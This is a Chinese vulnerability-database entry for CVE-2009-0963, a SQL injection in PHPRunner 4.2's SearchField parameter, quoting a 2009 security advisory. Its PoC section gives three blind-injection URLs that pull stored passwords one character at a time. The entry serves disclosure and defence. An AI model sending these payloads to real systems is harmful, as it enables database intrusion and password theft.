Xlinesoft PHPRunner 多个脚本SearchField参数SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117484 漏洞类型 SQL注入
发布时间 2009-03-17 更新时间 2009-04-01
CVE编号 CVE-2009-0963 CNNVD-ID CNNVD-200903-320
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8226
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-320
|漏洞详情
PHPRunner是一款PHP网页制作工具,可以生成读写MySql数据库的PHP网页。PHPRunner的(1)UserView_list.php,(2)orders_list.php,(3)users_list.php,和(4)Administrator_list.php中没有正确地验证对SearchField参数所传送的输入便在SQL查询中使用,远程攻击者可以通过提交恶意查询请求执行SQL注入攻击,完全入侵数据库系统。
|漏洞EXP
##########################www.BugReport.ir########################################
#
#        AmnPardaz Security Research Team
#
# Title:        PHPRunner SQL Injection
# Vendor:        http://www.xlinesoft.com
# Vulnerable Version:    4.2 (prior versions also may be affected)
# Exploitation:        Remote with browser
# Original Advisory:    http://www.bugreport.ir/index_63.htm
# Fix:            N/A
###################################################################################

####################
- Description:
####################

PHPRunner builds visually appealing web interface for popular databases. Your web site visitors will be able to easily search, add, edit, delete and exprt

data in MySQL, Oracle, SQL Server, MS Access, and Postgre databases.

####################
- Vulnerability:
####################

Input passed to the "SearchField" parameters in "UserView_list.php" is not properly sanitised before being used in SQL queries.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Vulnerable Pages: 'orders_list.php' , 'users_list.php' , 'Administrator_list.php'


####################
- PoC:
####################

Its possible to obtain plain text passwords from database by blind fishing exploit

http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=Password like '%%')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,1)='a')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,2)='ab')--

####################
- Solution:
####################

Edit the source code to ensure that inputs are properly sanitized.


####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com 

# milw0rm.com [2009-03-17]
|参考资料

来源:XF
名称:phprunner-searchfield-sql-injection(49278)
链接:http://xforce.iss.net/xforce/xfdb/49278
来源:VUPEN
名称:ADV-2009-0750
链接:http://www.vupen.com/english/advisories/2009/0750
来源:BID
名称:34146
链接:http://www.securityfocus.com/bid/34146
来源:BUGTRAQ
名称:20090317PHPRunnerSQLInjection
链接:http://www.securityfocus.com/archive/1/archive/1/501894/100/0/threaded
来源:MILW0RM
名称:8226
链接:http://www.milw0rm.com/exploits/8226
来源:MISC
链接:http://www.bugreport.ir/index_63.htm
来源:SECUNIA
名称:34330
链接:http://secunia.com/advisories/34330
来源:OSVDB
名称:52801
链接:http://osvdb.org/52801
来源:OSVDB
名称:52800
链接:http://osvdb.org/52800
来源:OSVDB
名称:52799
链接:http://osvdb.org/52799
来源:OSVDB
名称:52798
链接:http://osvdb.org/52798